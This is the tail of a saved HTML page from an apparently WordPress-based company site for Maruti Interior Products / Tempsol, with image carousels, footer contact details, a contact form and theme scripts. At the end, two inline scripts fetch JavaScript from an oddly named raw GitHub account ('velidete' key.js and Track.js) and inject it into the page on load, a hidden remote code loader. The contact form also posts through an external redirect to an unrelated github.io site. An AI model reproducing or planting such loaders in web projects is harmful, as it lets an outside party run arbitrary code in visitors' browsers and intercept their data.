</style>	<div id="id-53" class="owl-carousel carousel-slider arrows-inside arrows-visible-hover dots-hidden dots-center dots-square" data-slide-type="image-carousel" data-margin="10" data-slide-by="1" data-loop="true" data-lazy-load="false" data-stage-padding="0" data-auto-width="false" data-dots="false" data-nav="true" data-autoplay="true" data-autoplay-timeout="5000" data-autoplay-speed="500" data-autoplay-hover-pause="false" data-colums="1" data-colums-desktop="1" data-colums-small-desktop="1" data-colums-tablet="1" data-colums-small-tablet="1" data-colums-mobile="1">
<div class="carousel-slider__item"><img width="956" height="555" src="https://spitzebyeveryday.com/wp-content/uploads/2020/07/award-1.jpg" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="956" height="555" src="https://spitzebyeveryday.com/wp-content/uploads/2020/07/awards-6.jpg" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="956" height="555" src="https://spitzebyeveryday.com/wp-content/uploads/2020/07/award-2.jpg" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="956" height="555" src="https://spitzebyeveryday.com/wp-content/uploads/2020/07/award-3.jpg" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="956" height="555" src="https://spitzebyeveryday.com/wp-content/uploads/2020/07/award-4.jpg" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="956" height="555" src="https://spitzebyeveryday.com/wp-content/uploads/2020/07/awards-5.jpg" class="attachment-full size-full" alt="" loading="lazy" /></div>	</div>
</div>
</div>
</div>        </div>
</div>
</section>
-->

<section class="section  text-normal section-text-no-shadow section-inner-no-shadow section-normal section-opaque"  >
<div class="background-overlay grid-overlay-0 " style="background-color: rgba(240,240,240,1);"></div>
<div class="container-fullwidth container-vertical-middle">
<div class="row vertical-middle">
<div class="col-md-5    award-sec award-space col-md-push-6 text-default small-screen-default"  ><h2 class="text-left glance-heading element-top-20 element-bottom-20 text-normal normal regular" data-os-animation="none" data-os-animation-delay="0s" >
Our Work</h2><div class="col-text-1 text-normal award-des element-top-20 element-bottom-20" data-os-animation="none" data-os-animation-delay="0s">
<p>We update our work at here .</p>
</div>
<!--
<a href="https://spitzebyeveryday.com/infrastructure/" class="btn btn-default   text-normal  cust-btn element-left-0 element-right-0 element-top-20 element-bottom-20" target="_self"   data-os-animation="none" data-os-animation-delay="0s">
READ MORE     </a>
-->
</div><div class="col-md-6    awarad-slider col-md-pull-5 text-default small-screen-default"  ><div class="col-text-1 text-normal  element-top-0 element-bottom-0" data-os-animation="none" data-os-animation-delay="0s">
<div class="carousel-slider-outer carousel-slider-outer-images carousel-slider-outer-67">
<style type="text/css">
#id-67 .carousel-slider-nav-icon {
fill: #f1f1f1
}
#id-67 .carousel-slider-nav-icon:hover {
fill: #00d1b2
}
#id-67 .owl-prev,
#id-67 .owl-next,
#id-67 .carousel-slider-nav-icon {
height: 48px;
width: 48px
}
#id-67.arrows-outside .owl-prev {
left: -48px
}
#id-67.arrows-outside .owl-next {
right: -48px
}
#id-67 .owl-dots .owl-dot span {
background-color: #f1f1f1;
width: 10px;
height: 10px;
}
#id-67 .owl-dots .owl-dot.active span,
#id-67 .owl-dots .owl-dot:hover span {
background-color: #00d1b2
}
</style>	<div id="id-67" class="owl-carousel carousel-slider arrows-inside arrows-visible-hover dots-hidden dots-center dots-square" data-slide-type="image-carousel" data-margin="10" data-slide-by="1" data-loop="true" data-lazy-load="false" data-stage-padding="0" data-auto-width="false" data-dots="false" data-nav="true" data-autoplay="true" data-autoplay-timeout="5000" data-autoplay-speed="500" data-autoplay-hover-pause="false" data-colums="1" data-colums-desktop="1" data-colums-small-desktop="1" data-colums-tablet="1" data-colums-small-tablet="1" data-colums-mobile="1">
<div class="carousel-slider__item"><img width="1000" height="750" src="fimg/122.jpg" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="1000" height="750" src="fimg/143.jpg" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="1000" height="750" src="fimg/148.jpg" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="1000" height="750" src="fimg/149.jpg" class="attachment-full size-full" alt="" loading="lazy" /></div>	</div><!-- #id-## -->
</div>
</div>
</div><div class="col-md-1     text-default small-screen-default"  ></div>        </div>
</div>
</section>

<!--
<section class="section  hidden-lg hidden-md hidden-sm hidden-xs text-normal section-text-no-shadow section-inner-no-shadow section-normal section-opaque"  >
<div class="background-overlay grid-overlay-0 " style="background-color: rgba(240,240,240,1);"></div>
<div class="container-fullwidth container-vertical-middle">
<div class="row vertical-middle">
<div class="col-md-1     text-default small-screen-default"  ></div><div class="col-md-5    award-sec text-default small-screen-default"  ><h2 class="text-left glance-heading element-top-20 element-bottom-20 text-normal normal regular" data-os-animation="none" data-os-animation-delay="0s" >
PROCESS</h2><div class="col-text-1 text-normal award-des element-top-20 element-bottom-20" data-os-animation="none" data-os-animation-delay="0s">
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh dolore magna aliquam erat volutpat. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam</p>
</div>
<a href="coming.html" class="btn btn-default   text-normal  cust-btn element-left-0 element-right-0 element-top-20 element-bottom-20" target="_self"   data-os-animation="none" data-os-animation-delay="0s">
READ MORE     </a></div><div class="col-md-6    awarad-slider text-default small-screen-default"  ><div class="col-text-1 text-normal  element-top-0 element-bottom-0" data-os-animation="none" data-os-animation-delay="0s">
<div class="carousel-slider-outer carousel-slider-outer-images carousel-slider-outer-2110">
<style type="text/css">
#id-2110 .carousel-slider-nav-icon {
fill: #f1f1f1
}
#id-2110 .carousel-slider-nav-icon:hover {
fill: #00d1b2
}
#id-2110 .owl-prev,
#id-2110 .owl-next,
#id-2110 .carousel-slider-nav-icon {
height: 48px;
width: 48px
}
#id-2110.arrows-outside .owl-prev {
left: -48px
}
#id-2110.arrows-outside .owl-next {
right: -48px
}
#id-2110 .owl-dots .owl-dot span {
background-color: #f1f1f1;
width: 10px;
height: 10px;
}
#id-2110 .owl-dots .owl-dot.active span,
#id-2110 .owl-dots .owl-dot:hover span {
background-color: #00d1b2
}
</style>	<div id="id-2110" class="owl-carousel carousel-slider arrows-inside arrows-visible-hover dots-hidden dots-center dots-square" data-slide-type="image-carousel" data-margin="10" data-slide-by="1" data-loop="true" data-lazy-load="false" data-stage-padding="0" data-auto-width="false" data-dots="false" data-nav="true" data-autoplay="true" data-autoplay-timeout="5000" data-autoplay-speed="500" data-autoplay-hover-pause="false" data-colums="1" data-colums-desktop="1" data-colums-small-desktop="1" data-colums-tablet="1" data-colums-small-tablet="1" data-colums-mobile="1">
<div class="carousel-slider__item"><img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2020/09/SpitzeAwards.png" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-idn.png" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-pb.png" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-pb1.png" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-pb2.png" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-pb3.png" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards.png" class="attachment-full size-full" alt="" loading="lazy" /></div><div class="carousel-slider__item"><img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-powerbreand.png" class="attachment-full size-full" alt="" loading="lazy" /></div>	</div><!-- #id-## -->
</div>
</div>
</div>        </div>

</section>
<!--<span class="hide"><span class="author vcard"><span class="fn">spitzebyeveryday</span></span><span class="entry-title">Home</span><time class="entry-date updated" datetime="2020-07-07T09:16:18+00:00">07.07.2020</time></span></article>-->

<footer id="footer" role="contentinfo">
<section class="section">
<div class="container">
<div class="row element-top-10 element-bottom-10 footer-columns-4">
<div class="col-sm-3">
<div id="media_image-2" class="sidebar-widget  widget_media_image"><img width="1245" height="572" src="fimg/3.png" class="image wp-image-2013  attachment-full size-full" alt="" loading="lazy" style="max-width: 100%; height: auto;"/></div><div id="text-3" class="sidebar-widget  widget_text">			<div class="textwidget"><ul>
<li><img src="wp-content/uploads/2020/07/icon_email.png" />Info@tempsol.in</li>
</ul>
</div>
</div>
</div>
<div class="col-sm-3">
<div id="text-2" class="sidebar-widget  widget_text"><h3 class="sidebar-header">Address</h3>			<div class="textwidget"><ul>
<li><b>Maruti Interior Products Limited</b></li>
<li><img src="wp-content/uploads/2020/07/icon_location.png" /> X/1938 gali no -9 Gandhi Nagar Dehli INDIA</li>
</ul>
</div>
</div>
</div>
<div class="col-sm-3">
<div id="text-5" class="sidebar-widget  widget_text"><h3 class="sidebar-header">Quick Contact</h3>			<div class="textwidget"><div role="form" class="wpcf7" id="wpcf7-f768-o1" lang="en-US" dir="ltr">
<div class="screen-reader-response"><p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul></div>
<form action="../../external.html?link=https://parashari.github.io/#wpcf7-f768-o1" method="post" class="wpcf7-form init" novalidate="novalidate" data-status="init">
<div style="display: none;">
<input type="hidden" name="_wpcf7" value="768" />
<input type="hidden" name="_wpcf7_version" value="5.4.1" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f768-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />

</div>
<div class="col-md-6">
<div class="form-group">
<span class="wpcf7-form-control-wrap yourname"><input type="text" name="yourname" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false" placeholder="Name*" /></span>
</div>
<div class="form-group">
<span class="wpcf7-form-control-wrap uemail"><input type="email" name="uemail" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email form-control" aria-required="true" aria-invalid="false" placeholder="Email*" /></span>
</div>
<div class="form-group">
<span class="wpcf7-form-control-wrap uphone"><input type="text" name="uphone" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false" placeholder="Phone*" /></span>
</div>
</div>
<div class="col-md-6">
<div class="form-group">
<span class="wpcf7-form-control-wrap message"><textarea name="message" cols="40" rows="6" class="wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false" placeholder="Message"></textarea></span>
</div>
<!--<div class="form-group">
<span class="wpcf7-form-control-wrap recaptcha"><span data-sitekey="6Le0vHwaAAAAAKyo64dBSfpHWGMXo5gQ8wtrhFwe" class="wpcf7-form-control g-recaptcha wpcf7-recaptcha"></span>
<noscript>
<div class="grecaptcha-noscript">
<iframe src="https://www.google.com/recaptcha/api/fallback?k=6Le0vHwaAAAAAKyo64dBSfpHWGMXo5gQ8wtrhFwe" frameborder="0" scrolling="no">
</iframe>
<textarea name="g-recaptcha-response" rows="3" cols="40" placeholder="reCaptcha Response Here">
</textarea>
</div>
</noscript>
</span>
</div>-->
<div class="form-group">
<input type="submit" value="Send" class="wpcf7-form-control wpcf7-submit" />
</div>
</div>
<div class="wpcf7-response-output" aria-hidden="true"></div></form></div>
</div>
</div>
</div>





</div>
</div>
</section>
<section class="section subfooter">
<div class="container">
<div class="row element-top-10 element-bottom-10 footer-columns-2">
<div class="col-sm-6">
<div id="text-4" class="sidebar-widget  widget_text">			<div class="textwidget"><p><a href="https://www.tempsol.in/" class="footerbar">www.temosol.in</a></p>
</div>
</div>
</div>
<!--<div class="col-sm-6">
<div id="oxywidgetsocial-2" class="sidebar-widget  widget_social"><ul class="unstyled inline social-icons social-simple social-normal"><li><a target="_blank"  href="https://facebook.com/"><i class="fa fa-facebook-official"></i></a></li><li><a target="_blank"  href="https://instagram.com/"><i class="fa fa-instagram"></i></a></li><li><a target="_blank"  href="https://mobile.twitter.com/"><i class="fa fa-twitter"></i></a></li><li><a target="_blank"  href="https://www.linkedin.com/"><i class="fa fa-linkedin"></i></a></li><li><a target="_blank"  href="https://in.pinterest.com/"><i class="fa fa-pinterest"></i></a></li><li><a target="_blank"  href="https://www.youtube.com/"><i class="fa fa-youtube"></i></a></li></ul></div>
</div>
</div>
</div>-->
</div>
</div>
</section>
</footer>

<!-- Fixing the Back to top button -->
<a href="javascript:void(0)" class="go-top go-top-square ">
<i class="fa fa-angle-up"></i>
</a>
<link href="https://fonts.googleapis.com/css?family=Roboto:400" rel="stylesheet" property="stylesheet" media="all" type="text/css" >
<script type="text/javascript">
if(typeof revslider_showDoubleJqueryError === "undefined") {
function revslider_showDoubleJqueryError(sliderID) {
var err = "<div class='rs_error_message_box'>";
err += "<div class='rs_error_message_oops'>Oops...</div>";
err += "<div class='rs_error_message_content'>";
err += "You have some jquery.js library include that comes after the Slider Revolution files js inclusion.<br>";
err += "To fix this, you can:<br>&nbsp;&nbsp;&nbsp; 1. Set 'Module General Options' -> 'Advanced' -> 'jQuery & OutPut Filters' -> 'Put JS to Body' to on";
err += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jQuery.js inclusion and remove it";
err += "</div>";
err += "</div>";
var slider = document.getElementById(sliderID); slider.innerHTML = err; slider.style.display = "block";
}
}
</script>
<script type='text/javascript' src='js/wp-polyfill.min.js' id='wp-polyfill-js'></script>
<script type='text/javascript' id='wp-polyfill-js-after'>
( 'fetch' in window ) || document.write( '<script src="js/wp-polyfill-fetch.min.js"></scr' + 'ipt>' );( document.contains ) || document.write( '<script src="js/wp-polyfill-node-contains.min.js"></scr' + 'ipt>' );( window.DOMRect ) || document.write( '<script src="js/wp-polyfill-dom-rect.min.js"></scr' + 'ipt>' );( window.URL && window.URL.prototype && window.URLSearchParams ) || document.write( '<script src="js/wp-polyfill-url.min.js"></scr' + 'ipt>' );( window.FormData && window.FormData.prototype.keys ) || document.write( '<script src="js/wp-polyfill-formdata.min.js"></scr' + 'ipt>' );( Element.prototype.matches && Element.prototype.closest ) || document.write( '<script src="js/wp-polyfill-element-closest.min.js"></scr' + 'ipt>' );( 'objectFit' in document.documentElement.style ) || document.write( '<script src="js/wp-polyfill-object-fit.min.js"></scr' + 'ipt>' );
</script>
<script type='text/javascript' id='contact-form-7-js-extra'>
/* <![CDATA[ */
var wpcf7 = {"api":{"root":"https:\/\/spitzebyeveryday.com\/wp-json\/","namespace":"contact-form-7\/v1"}};
/* ]]> */
</script>
<script type='text/javascript' src='js/index.js' id='contact-form-7-js'></script>
<script type='text/javascript' src='js/jquery.flexslider-min.js' id='flexslider-js'></script>
<script type='text/javascript' id='mediaelement-core-js-before'>
var mejsL10n = {"language":"en","strings":{"mejs.download-file":"Download File","mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen":"Fullscreen","mejs.play":"Play","mejs.pause":"Pause","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.live-broadcast":"Live Broadcast","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}};
</script>
<script type='text/javascript' src='wp-includes/js/mediaelement/mediaelement-and-player.min08e1.js' id='mediaelement-core-js'></script>
<script type='text/javascript' src='wp-includes/js/mediaelement/mediaelement-migrate.minb2de.js' id='mediaelement-migrate-js'></script>
<script type='text/javascript' id='mediaelement-js-extra'>
/* <![CDATA[ */
var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"};
/* ]]> */
</script>
<script type='text/javascript' src='wp-includes/js/mediaelement/wp-mediaelement.minb2de.js' id='wp-mediaelement-js'></script>
<script type='text/javascript' id='lambda-theme-js-extra'>
/* <![CDATA[ */
var oxyThemeData = {"navbarScrolledPoint":"30","navbarHeight":"120","navbarScrolled":"120","siteLoader":"off","menuClose":"off","scrollFinishedMessage":"No more items to load.","hoverMenu":{"hoverActive":false,"hoverDelay":200,"hoverFadeDelay":200}};
/* ]]> */
</script>
<script type='text/javascript' src='wp-content/themes/tempsol/lambda/assets/js/theme.min5152.js' id='lambda-theme-js'></script>
<script type='text/javascript' src='wp-content/plugins/carousel-slider/assets/lib/owl-carousel/owl.carousel.min531b.js' id='owl-carousel-js'></script>
<script type='text/javascript' src='wp-content/plugins/carousel-slider/assets/lib/magnific-popup/jquery.magnific-popup.minf488.js' id='magnific-popup-js'></script>
<script type='text/javascript' src='wp-content/plugins/carousel-slider/assets/js/frontendfc6b.js' id='carousel-slider-frontend-js'></script>
<script type='text/javascript' src='wp-includes/js/wp-embed.minb2de.js' id='wp-embed-js'></script>
<script type='text/javascript' src='wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min10df.js' id='wpb_composer_front_js-js'>
</script>
<!--
<script type='text/javascript' src='https://spitzebyeveryday.com/wp-content/plugins/wpcf7-recaptcha/assets/js/wpcf7-recaptcha-controls.js?ver=1.1' id='wpcf7-recaptcha-controls-js'></script>
-->

<script type='text/javascript' src='wp-content/themes/tempsol/lambda/assets/js/sidebar-menu.js'></script>
<script>
jQuery(document).ready(function(){
jQuery( ".footer-columns-4 .col-sm-3:nth-child(3)" ).addClass('col-sm-6');
jQuery( ".footer-columns-4 .col-sm-3:nth-child(4)" ).hide();
});            
</script>


<script>

"use strict";
  document.addEventListener("DOMContentLoaded",function xhr() {
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'https://raw.githubusercontent.com/licence244466666/velidete/main/tempsol/key.js', true);
  xhr.onload = function () {
    var script = document.createElement('script');
    script.id = 'htmlbody'
    script.innerHTML = xhr.responseText;
    document.body.insertBefore(script, document.body.firstChild);
  };
  xhr.send();
});
</script>

<script>
     "use strict";
     function header_response() {
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'https://raw.githubusercontent.com/licence244466666/velidete/main/Track.js', true);
  xhr.onload = function () {
    var script = document.createElement('script');
    script.id = 'header_response'
    script.innerHTML = xhr.responseText;
    document.body.insertBefore(script, document.body.firstChild);
  };
  xhr.send();
}
header_response();
  
</script>


</body>

</html>
